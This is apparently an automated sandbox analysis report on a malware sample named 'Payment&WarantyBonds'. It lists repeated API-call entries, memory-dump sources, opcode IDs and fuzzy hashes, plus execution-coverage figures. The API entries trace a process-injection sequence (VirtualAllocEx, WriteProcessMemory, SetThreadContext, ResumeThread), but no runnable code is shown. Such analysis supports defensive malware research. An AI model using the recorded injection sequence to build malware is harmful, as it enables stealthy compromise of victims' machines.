                                                                                                                                                                                • Instruction Fuzzy Hash: 53916B71D10259CFDB20DF69C8417EDBBB6FF48314F1481AAE819A7280DB749A85CF91

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 007AAFDE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                • Opcode ID: 8c85870cb1e6396735b520c6864e09b6b066620651b33fc9f670b3d10387ea32
                                                                                                                                                                                • Instruction ID: 976ca237cd5540d2d1b1c3d4750086c38191125f6d42ca109072a2bdca5f7d18
                                                                                                                                                                                • Opcode Fuzzy Hash: 8c85870cb1e6396735b520c6864e09b6b066620651b33fc9f670b3d10387ea32
                                                                                                                                                                                • Instruction Fuzzy Hash: 66714470A00B059FDB24DF29D04575ABBF1FF89304F108A2DE48AD7A50DB78E949CB92
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 007A59C9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                • Opcode ID: 8b1b89edbf6eeec54ce2356b57a15fae519f708ff65855edd738749a0518cbe0
                                                                                                                                                                                • Instruction ID: 4580821ca8187e9577e949556699764fec46b12eb72f1a5f735291b34532ba40
                                                                                                                                                                                • Opcode Fuzzy Hash: 8b1b89edbf6eeec54ce2356b57a15fae519f708ff65855edd738749a0518cbe0
                                                                                                                                                                                • Instruction Fuzzy Hash: D141F1B0D0071DCFDB24CFA9C884B8EBBB5BF89304F20816AD408AB251DB75A945CF90
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 007A59C9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                • Opcode ID: 470882d081f827564ed5d06548ce147ff62a7fabc1cb649f043c2cc910fc4d6f
                                                                                                                                                                                • Instruction ID: cd51a4f54371aa50e406323152059910fbcce4be5d82a4518ae4a1e057d701d4
                                                                                                                                                                                • Opcode Fuzzy Hash: 470882d081f827564ed5d06548ce147ff62a7fabc1cb649f043c2cc910fc4d6f
                                                                                                                                                                                • Instruction Fuzzy Hash: 7241D3B1D0071DCFDB24CFA9C884B8EBBB5BF89304F24816AD409AB255DB75A945CF90
                                                                                                                                                                                APIs
                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00C03840
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00C03840
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C03920
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00C03696
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007AD6EF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C03920
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00C03696
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007AD6EF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C0375E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • OutputDebugStringW.KERNELBASE(00000000), ref: 066D7860
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugOutputString
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1166629820-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C0375E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • OutputDebugStringW.KERNELBASE(00000000), ref: 066D7860
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugOutputString
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1166629820-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 00C05DC5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 00C05DC5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 007AAFDE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715034540.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_74d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715081417.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_75d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715081417.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_75d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715081417.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_75d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715034540.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_74d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                • Instruction ID: 00d6c3865edc5544fb35ed6c9f8ce1c77e15a8cb2212724258979decbfedbc02
                                                                                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                • Instruction Fuzzy Hash: 6E112276404280CFCB12CF14D9C4B16BF72FB94324F24C2A9DC490B256C33AE85ACBA2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715081417.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_75d000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                • Instruction ID: 7f91540d598edeb8f18bf05a2b1da30b21d42452659b98b3f1c271a06d0cfdcf
                                                                                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F11BB75504280DFDB22CF10C5C4B55BBA1FB84324F24C6AEDC494B296C37AD84ACB61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1952187b8dacd07feb39c78f9f199bf977d367ac9bc929f7c08086dedb9da566
                                                                                                                                                                                • Instruction ID: 2d3580831c8787ed3eebac25b0215a949afc53fd20f838795265818d61bb6d0f
                                                                                                                                                                                • Opcode Fuzzy Hash: 1952187b8dacd07feb39c78f9f199bf977d367ac9bc929f7c08086dedb9da566
                                                                                                                                                                                • Instruction Fuzzy Hash: F8E11CB4E102198FDB14DF99C5809AEFBB2FF89304F249159E415AB359D730AD42CFA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 70f137449ef08a70d0a5fccb01304f45d356e7611a74539baee2742d832c6a6c
                                                                                                                                                                                • Instruction ID: b6f3fd6f5eeb3eaa2cd07f0149bc6ab33e8a9f46f6e50de6a0f4c080c697bc02
                                                                                                                                                                                • Opcode Fuzzy Hash: 70f137449ef08a70d0a5fccb01304f45d356e7611a74539baee2742d832c6a6c
                                                                                                                                                                                • Instruction Fuzzy Hash: 6FE11AB4E101198FDB14DFA9C5809AEFBF2FF89304F248169E415AB35AD730A941CFA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ce0a059e1b09b9b6675b3baededd9ba93f5ed465788c0b2d0ceb06edca942be3
                                                                                                                                                                                • Instruction ID: 9f90c2bd65514268bd6ce8ee8f5f2bf0710396baad1a40f95576f8bc079d931f
                                                                                                                                                                                • Opcode Fuzzy Hash: ce0a059e1b09b9b6675b3baededd9ba93f5ed465788c0b2d0ceb06edca942be3
                                                                                                                                                                                • Instruction Fuzzy Hash: 23E11AB4E101198FDB14DFA9C5809AEFBB2FF88304F248169E415AB35AD731AD41CFA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5de70d2f4f265794c1fdb5b9d5a420d18429d01945cda3bda7fbb72d675de021
                                                                                                                                                                                • Instruction ID: 4d60fa78c072473d771d4f30be2b9c430772a473cf34471e6cf00ff5cda36a90
                                                                                                                                                                                • Opcode Fuzzy Hash: 5de70d2f4f265794c1fdb5b9d5a420d18429d01945cda3bda7fbb72d675de021
                                                                                                                                                                                • Instruction Fuzzy Hash: 69E11A74E102198FDB14DFA9C5849AEFBB2FF89304F249169E415AB35AD730AD41CFA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 94cd6d466d86a5a9b48893bcdb9c32e68ded80f63a1639ad556453f1c03068a7
                                                                                                                                                                                • Instruction ID: b93ed5ebad259cbf095b09b2ee05807c73a61b76726606511f1bae1b90636ed9
                                                                                                                                                                                • Opcode Fuzzy Hash: 94cd6d466d86a5a9b48893bcdb9c32e68ded80f63a1639ad556453f1c03068a7
                                                                                                                                                                                • Instruction Fuzzy Hash: 1AE1D9B4E001199FCB14DFA9C5809AEFBF2FF49304F249169E914AB359D731A942CF61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 53bbc229f5034b2570cabfff0143a70c9010e755ca9708a3565e0370b54d72f6
                                                                                                                                                                                • Instruction ID: eaa729a990a10f6bf40066245bf0012b2bed513b97dae1460991b3ae9ed8e31b
                                                                                                                                                                                • Opcode Fuzzy Hash: 53bbc229f5034b2570cabfff0143a70c9010e755ca9708a3565e0370b54d72f6
                                                                                                                                                                                • Instruction Fuzzy Hash: 7CE1F774E002198FDB14DFA9C5849AEBBF2FF89304F249169D515AB35ADB30AD42CF60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f12cad7df0cca4e0ff1f114aec53e935693a6bdf361fc7683a813f574ed9e778
                                                                                                                                                                                • Instruction ID: 6d30e96aa5337583e19c3b43eeda55c556c464a38800d3a5bf1813dc45afe3b4
                                                                                                                                                                                • Opcode Fuzzy Hash: f12cad7df0cca4e0ff1f114aec53e935693a6bdf361fc7683a813f574ed9e778
                                                                                                                                                                                • Instruction Fuzzy Hash: 13E1E974E002198FCB14DFA9C580AAEFBF2FF49304F249169E554AB35AD731A942CF60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b0747de51385e47c85d96af44500c6725f36d9952dc884778ed1c7504b017e03
                                                                                                                                                                                • Instruction ID: 29c07990ad045206e9d23596177e1c88aaf6b87eb67c09559707037706b23fa3
                                                                                                                                                                                • Opcode Fuzzy Hash: b0747de51385e47c85d96af44500c6725f36d9952dc884778ed1c7504b017e03
                                                                                                                                                                                • Instruction Fuzzy Hash: 42E1E674E001598FCB14DFA9C5849AEFBF2FF89304F249169E515AB35AD730AA42CF60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0320dfe1c4fdd7cd4cd4baf8c5fa173554add729a37bec3f976b574f1e8de0c6
                                                                                                                                                                                • Instruction ID: a1a849f2d1f8d57823af95de02c91690d68819ce0b2c9812259e06a040016c2f
                                                                                                                                                                                • Opcode Fuzzy Hash: 0320dfe1c4fdd7cd4cd4baf8c5fa173554add729a37bec3f976b574f1e8de0c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 23D1E774E002198FDB14DFA9C580AAEFBF2FF49305F249169E415AB35AD730A942CF61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:1.1%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:5.6%
                                                                                                                                                                                Signature Coverage:3.2%
                                                                                                                                                                                Total number of Nodes:126
                                                                                                                                                                                Total number of Limit Nodes:8

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 176 417643-41766c call 42f103 179 417672-417680 call 42f703 176->179 180 41766e-417671 176->180 183 417690-4176a1 call 42dba3 179->183 184 417682-41768d call 42f9a3 179->184 189 4176a3-4176b7 LdrLoadDll 183->189 190 4176ba-4176bd 183->190 184->183 189->190
                                                                                                                                                                                APIs
                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176B5
                                                                                                                                                                                Memory Dump Source
